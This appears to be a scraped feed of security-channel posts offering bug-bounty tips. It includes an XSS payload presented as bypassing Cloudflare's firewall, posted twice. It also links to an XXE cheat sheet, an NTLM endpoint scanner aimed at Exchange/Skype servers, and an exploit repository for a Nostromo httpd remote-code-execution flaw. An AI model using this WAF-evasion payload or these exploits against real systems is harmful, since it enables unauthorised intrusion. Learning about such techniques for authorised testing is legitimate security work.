Forwarded from امنیت اطلاعات
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
Forwarded from امنیت اطلاعات
XXE Cheat Sheet
XXE - XML External ENTITY Injection
https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html
XXE - XML External ENTITY Injection
https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html
Securityidiots
XXE Cheat Sheet by SecurityIdiots
SecurityIdiots - A Blog to keep a note of stuff we explore
a little python script to scan for NTLM auth directories
https://github.com/nyxgeek/ntlmscan
useful against OWA/Skype/autodiscover servers
https://github.com/nyxgeek/ntlmscan
useful against OWA/Skype/autodiscover servers
GitHub
GitHub - nyxgeek/ntlmscan: scan for NTLM directories
scan for NTLM directories. Contribute to nyxgeek/ntlmscan development by creating an account on GitHub.
Nostromo httpd RCE vulnerability (CVE-2019-16278) #bugbountytips
https://github.com/jas502n/CVE-2019-16278
https://github.com/jas502n/CVE-2019-16278